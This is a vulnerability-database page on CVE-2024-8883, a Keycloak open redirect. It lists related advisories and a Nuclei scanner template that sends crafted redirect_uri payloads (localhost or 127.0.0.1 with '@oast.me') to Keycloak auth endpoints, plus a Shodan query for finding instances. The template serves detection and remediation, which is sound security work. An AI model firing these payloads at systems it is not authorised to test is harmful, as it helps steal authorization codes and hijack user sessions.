| Reporter | Title | Published | Views | Family All 59 |
|---|---|---|---|---|
| CVE-2024-8883 | 19 Sep 202416:15 | – | attackerkb | |
| CVE-2024-8883 vulnerabilities | 19 Sep 202416:15 | – | cgr | |
| CVE-2024-8883 | 19 Sep 202418:40 | – | circl | |
| Red Hat Keycloak 输入验证错误漏洞 | 19 Sep 202400:00 | – | cnnvd | |
| CVE-2024-8883 | 19 Sep 202415:48 | – | cve | |
| CVE-2024-8883 Keycloak: vulnerable redirect uri validation results in open redirec | 19 Sep 202415:48 | – | cvelist | |
| EUVD-2024-3152 | 3 Oct 202520:07 | – | euvd | |
| Duplicate Advisory: Keycloak Open Redirect vulnerability | 19 Sep 202418:30 | – | github | |
| Keycloak has Vulnerable Redirect URI Validation Results in Open Redirect | 14 Oct 202420:55 | – | github | |
| CVE-2024-8883 | 19 Sep 202416:15 | – | nvd |
id: CVE-2024-8883
info:
name: Keycloak - Open Redirect
author: iamnoooob,rootxharsh,pdresearch
severity: medium
description: |
A misconfiguration flaw was found in Keycloak. This issue can allow an attacker to redirect users to an arbitrary URL if a 'Valid Redirect URI' is set to http://localhost or http://127.0.0.1, enabling sensitive information such as authorization codes to be exposed to the attacker, potentially leading to session hijacking.
impact: |
Attackers can redirect users to malicious URLs and capture sensitive information such as authorization codes and session tokens, potentially leading to session hijacking and account compromise.
remediation: |
Update Keycloak configuration to avoid using localhost or 127.0.0.1 as Valid Redirect URIs, and apply security patches addressing the open redirect vulnerability.
reference:
- https://github.com/advisories/GHSA-vvf8-2h68-9475
- https://nvd.nist.gov/vuln/detail/CVE-2024-8883
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N
cvss-score: 6.8
cve-id: CVE-2024-8883
cwe-id: CWE-601
epss-score: 0.01959
epss-percentile: 0.77893
metadata:
max-request: 1
verified: true
shodan-query: title:"keycloak"
tags: cve,cve2024,keycloak,redirect,vuln,vkev
variables:
redirect_uri: "oast.me"
http:
- raw:
- |
GET /realms/master/protocol/openid-connect/auth?client_id={{client_id}}&redirect_uri={{redir_host}}:80@{{redirect_uri}} HTTP/1.1
Host: {{Hostname}}
payloads:
redir_host:
- http://localhost
- http://127.0.0.1
- https://localhost
- https://127.0.0.1
- http://[::]
- https://[::]
client_id:
- security-admin-console
- master-realm
- broker
- admin-cli
- account
- account-console
attack: clusterbomb
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
part: header
regex:
- 'Location:\s+https?://(localhost|127.0.0.1|\[::\]):\d*@oast\.me\?'
- type: status
status:
- 302
# digest: 4a0a00473045022000c8a4de21e3c3f5d68884e517dff9ed3689849896973dd4de8d05e96c078d4802210097eb6e0df7b48a01c1df216f5d1c8b59d6c0099241c05f5a3dde0f6903bbd733:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation